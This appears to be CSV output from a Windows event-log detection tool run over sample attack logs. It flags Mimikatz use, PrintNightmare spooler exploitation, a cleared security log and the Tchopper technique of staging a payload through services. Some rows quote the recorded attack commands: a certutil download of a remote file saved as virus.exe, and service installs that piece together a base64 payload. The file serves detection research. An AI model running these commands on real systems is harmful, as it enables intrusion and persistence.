+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx
+2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx"
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx
+2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx
+2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
+2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx
+2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:16.295 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlbGwgc2NyaXB0IGluY2x1ZGVzIHRocmVlIG9wdGlvbnMgZm9yIEVQUyBkYXRhIGNvbGxlY3Rpb246DQojDQojIE9wdGlvbiAxKSBTY2FuIHRoZSBldmVudCBsb2cocykgb2YgdGhlIGxvY2FsIFdp | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:17.775 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmRvd3MgaG9zdCB0byBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIA0KIyAgICAgICAgICAgKEVQUykgcmF0ZS4NCiMgT3B0aW9uIDIpIFNjYW4gYSBsaXN0IG9mIElQIGFkZHJlc3Nlcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:19.262 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Bwcm92aWRlZCBieSB0aGUgdXNlci4gVGhlIHJlbW90ZSBzeXN0ZW1zIEV2ZW50IExvZyhzKSBhcmUgDQojICAgICAgICAgICBzY2FubmVkIHRvIGRldGVybWluZSB0aGUgRXZlbnRzIFBlciBTZWNv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:20.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmQgKEVQUykgcmF0ZSBvZiBlYWNoIGhvc3QgaW4gdGhlIGxpc3QuDQojIE9wdGlvbiAzKSBTY2FuIHRoZSBsb2NhbCBkb21haW4gd2hlcmUgdGhlIHNjcmlwdCBpcyBydW4gdG8gZGV0ZXJtaW5lIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:22.220 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RoZSBFdmVudHMgUGVyIFNlY29uZCAoRVBTKSANCiMgICAgICAgICAgIHJhdGUgb2YgYWxsIFdpbmRvd3MgaG9zdHMgd2l0aGluIHRoZSBkb21haW4uDQojDQojIE5vdGU6IFBvd2VyU2hlbGwgbXVz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:23.679 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dCBiZSBydW4gYXMgbG9jYWwgYWRtaW4gJiB1c2VycyBtdXN0IHJ1biBTZXQtRXhlY3V0aW9uUG9saWN5IFJlbW90ZVNpZ25lZA0KIyAgICAgICBUbyB1c2UgT3B0aW9uIDMgZm9yIGRvbWFpbiBzY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:25.150 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FucywgUG93ZXJzaGVsbCBkb21haW4gY21kbGV0cyBuZWVkIHRvIGJlIGluc3RhbGxlZC4NCiMNCiMgUHJlLXJlcXVpc2l0ZXM6IFRoaXMgc2NyaXB0IHJlcXVpcmVzIFBvd2Vyc2hlbGwgMy4wIG9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
